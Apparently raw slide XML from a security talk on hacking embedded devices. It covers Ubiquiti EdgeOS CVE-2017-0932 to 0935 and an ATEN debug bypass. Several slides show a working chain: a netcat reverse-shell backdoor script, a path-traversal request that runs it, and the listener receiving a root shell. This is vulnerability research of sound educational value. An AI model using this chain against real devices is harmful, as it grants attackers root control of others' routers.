            <a:ext cx="10610444" cy="160043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maycon@DayOfDevil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Vivo]$ ./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aten_bypass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C6629493C0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enable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DebugFlag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ZHAL&gt; ATEN 1,10F0A563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disable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DebugFlag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ZHAL&gt; ATEN 0,10F0A563</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="319228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3049-DED6-43D8-9E06-267366D8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implescreenrecorder-2018-10-19_17.48.50">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1519446-417B-4F83-BA01-5BABEDC3E9E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5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035" y="365125"/>
            <a:ext cx="11063930" cy="6127750"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22414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45623-DFB7-4E8C-B144-A6902910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UBNT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7535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A237-8F5B-4B1D-B3A8-653118AA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CVE-2017-0935 – Privilege Escalation with Session Hijacking</a:t>
            </a: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312BD-38B9-4EEF-ADDE-E7C8AF40A5CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1942782"/>
            <a:ext cx="10205621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operator@ubnt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df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-h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Filesystem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Used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Available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Use%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Mounted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ubi0_0                  214.9M    144.4M     65.8M  69%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root.dev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aufs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214.9M    144.4M     65.8M  69% /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devtmpfs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124.4M         0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56.0K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56.0K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52.0K    124.4M   0% /var/log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    0    124.5M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124.5M    112.0K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vyatta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config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operator@ubnt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425860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A237-8F5B-4B1D-B3A8-653118AA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CVE-2017-0935 – Privilege Escalation with Session Hijacking</a:t>
            </a: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312BD-38B9-4EEF-ADDE-E7C8AF40A5CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1942782"/>
            <a:ext cx="1020562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operator@ubnt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df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-h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Filesystem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Used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Available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Use%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Mounted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ubi0_0                  214.9M    144.4M     65.8M  69%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root.dev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aufs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214.9M    144.4M     65.8M  69% /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devtmpfs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124.4M         0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60.0K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60.0K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52.0K    124.4M   0% /var/log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124.5M         0    124.5M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124.5M    112.0K    124.4M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vyatta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config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unionfs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124.5M         0    124.5M   0% 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vyatta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config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tmp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/new_config_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>g73ik18gms70ciap15in0mttpt0vk81b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operator@ubnt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1764326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3D13-24A5-4942-A924-597ED1D1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CVE-2017-0934 – Privilege Escalation with Session Hijacking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08BBC-6AA5-4C9A-9541-0D5FBF55E90F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1800740"/>
            <a:ext cx="10205621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total 0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drwxrwxrwt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4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300 Jan  1 00:07 .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   31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760 Jan  1 00:00 ..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imi_line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srw-rw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imi_show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srw-rw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nsm_show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nsmserv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rib_serv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srw-rw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0 Jan  1 00:00 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rib_show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    2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vyattacf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60 Jan  1 00:07 changes_only_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>9ckaihkfskhjt4q7t7d52c87tfvnbioi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-x---    2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root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40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ifp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srwxrwx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vyattacf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ubnt.socket.cfgd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srwxrwx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www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-data       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ubnt.socket.cli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srw-rw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ubnt.socket.platd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srwxrwx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www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-data       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ubnt.socket.statsd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srwxrwx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---    1 root    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www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-data       0 Jan  1 00:00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ubnt.socket.sysd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54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0C59-CEAD-4B06-AC9B-907F5B9F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CVE-2017-0933 – CSRF Bypassing “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:” Whitelisting Protection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D9E9B-C473-43C1-9DCA-22ABA94853FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1800740"/>
            <a:ext cx="1020562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ls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la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fake_www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total 16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 2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hnrteam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4096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jun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15 02:08 .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drwxr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xr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-x 7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hnrteam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4096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jun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15 02:03 ..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-r--r-- 1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hnrteam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3847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jun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15 02:05 index.html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-r--r-- 1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hnrteam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users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232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jun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15 02:03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lighttpd.conf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EE67E-96D5-40FD-B7BE-2071602C6BF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="4092660"/>
            <a:ext cx="1020562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server.document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-root = "/home/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operator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fake_www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server.port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= 3000</a:t>
            </a:r>
          </a:p>
          <a:p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mimetype.assign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= (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".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 =&gt;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", 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index-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file.names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= ( "index.html"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93912-F015-4F6C-A202-7874C7C6DB79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="748703" y="3621441"/>
            <a:ext cx="4954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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1"/>
              <a:t>content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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" i="1" dirty="0" err="1"/>
              <a:t>lighttpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0"/>
              <a:t> file: </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="107135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C360-BE28-43BE-BE1A-61DB043C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CVE-2017-0932 - Privilege Escalation using API-&gt;Feature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15E91-D9CB-4D96-9859-01220EA69E20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1800740"/>
            <a:ext cx="1020562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cat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Backdoor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wizard-run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#!/bin/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bash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nc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192.168.2.2:1337 -e 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bash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5DB0A-A6BE-4442-B304-1710C5B1DD65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="3093258"/>
            <a:ext cx="10205621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POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>api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edge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feature.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> HTTP/1.1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Host: 192.168.2.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: https://192.168.2.1/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Content-Type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>application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json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X-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Requested</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>With</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>XMLHttpRequest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 err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Content-Length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: 90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Cookie: PHPSESSID=i6um09hej0ku2k5ctcp6ib56f1nrqhi7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Connection: close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{"data":{"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>scenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>":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"../../../../../home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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operator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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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Backdoor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pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>":"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>load</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>","</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>input":"id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"}}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="336982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01AB3-38A0-4102-B122-AE8AC4EC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b="12194"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="657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7C3C-8135-4E87-8C46-A91C0722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General Overview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blob:https://web.whatsapp.com/7f92ceb0-cde9-4da1-88a5-62a5c2ac55ca">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{431AADDB-4A0A-42B5-9480-E1EF264B3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blob:https://web.whatsapp.com/7f92ceb0-cde9-4da1-88a5-62a5c2ac55ca">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2D61831-73F6-4AA8-851C-3F261B66CB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76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C360-BE28-43BE-BE1A-61DB043C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CVE-2017-0932 - Privilege Escalation using API-&gt;Feature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15E91-D9CB-4D96-9859-01220EA69E20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1800740"/>
            <a:ext cx="1020562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cat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Backdoor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wizard-run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#!/bin/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bash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nc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192.168.2.2:1337 -e /bin/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bash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5DB0A-A6BE-4442-B304-1710C5B1DD65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="3093258"/>
            <a:ext cx="10205621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POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>api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edge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feature.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> HTTP/1.1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Host: 192.168.2.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: https://192.168.2.1/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Content-Type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>json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X-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Requested</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>With</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>XMLHttpRequest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 err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Content-Length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: 90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Cookie: PHPSESSID=i6um09hej0ku2k5ctcp6ib56f1nrqhi7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Connection: close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{"data":{"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>scenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>":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"../../../../../home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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operator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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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Backdoor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0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pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>":"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>load</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>","</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>input":"id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"}}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0253C-1C29-4167-8EB3-4D5FD5509D38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1044420" y="2530189"/>
            <a:ext cx="9793180" cy="20313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$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nc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lvp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1337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Listening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[0.0.0.0] (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family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0,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port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1337)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Connection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from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192.168.2.1 44440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received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pt-BR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=0(root) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=102(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>vyattacfg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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uname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-a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Linux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ubnt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3.10.14-UBNT #1 SMP Sat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Apr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22 06:38:07 PDT 2017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mips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GNU/Linux</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="428863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6D619-B80B-4604-BC8B-2A83CF11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Questions?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15" descr="Help">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07EC1929-446C-43BE-9FD7-F0B26155A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1B19-11BF-4DAC-B3F4-435AA424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endParaRPr lang="pt-BR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0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iot device">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4FA1E61-C9E0-4F12-B5D4-805DD602D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4529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53F54-733F-4365-A17A-1BD4834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General Overview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91F4-397E-4943-BD73-5CCC46D2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509865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Used by 64% of organizations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Present on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" strike="sngStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>almost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 100% of all residents.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[g]old architecture designing.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Operating System with almost no protection (80s like exploitation)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Security isn’t a “MUST DO” to developers.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Common weaknesses.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0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B5683-5DA0-4FAE-BF0A-9EC58F61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Toolset</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="141370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8129-BE57-458E-B4EA-A56CAF4F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Toolset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B6EC-2376-470D-AC80-1623C867E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439" y="1978025"/>
            <a:ext cx="5253361" cy="1149026"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reversing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>radare2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13962B-FD16-4A26-AC39-EB3C1A750D8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9839" cy="1979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Firmware Extraction (SPI)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SOIC Clip</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BusPirate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> / Raspberry Pi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>flashrom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608291-9412-48E9-A70B-2831858B0FDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="3957746"/>
            <a:ext cx="5262239" cy="2185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Debugging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>qemu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (target arch)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gcc-multilib</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gef</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="Resultado de imagem para buspirate">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61A95BE9-82FB-4B0D-A129-08CC4BA7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167" r="95333">
                        <a14:foregroundMark x1="8000" y1="55333" x2="6167" y2="56500"/>
                        <a14:foregroundMark x1="90833" y1="42333" x2="91333" y2="40500"/>
                        <a14:foregroundMark x1="95333" y1="36833" x2="95333" y2="3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61" y="1535436"/>
            <a:ext cx="4957439" cy="49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3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7BC6F-4433-432E-8A2F-FDB592CD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Firmware Extraction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28587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99CD0-7DC0-4879-8046-7EFDFA1C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Vendor Download Page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58A1D0-BB24-45CF-B3AE-865F27A4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0" t="22639" r="8545" b="9931"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5153822" y="1383908"/>
            <a:ext cx="6553545" cy="40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7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Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>256</Paragraphs>
  <Slides>41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Internet of Sh*t Hacking Embedded Devices</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Who am I?</vt:lpstr>
      <vt:lpstr>General Overview</vt:lpstr>
      <vt:lpstr>General Overview</vt:lpstr>
      <vt:lpstr>Toolset</vt:lpstr>
      <vt:lpstr>Main Toolset</vt:lpstr>
      <vt:lpstr>Firmware Extraction</vt:lpstr>
      <vt:lpstr>Vendor Download Page</vt:lpstr>
      <vt:lpstr>Network Sniffing</vt:lpstr>
      <vt:lpstr>SPI Extraction</vt:lpstr>
      <vt:lpstr>SPI Extraction</vt:lpstr>
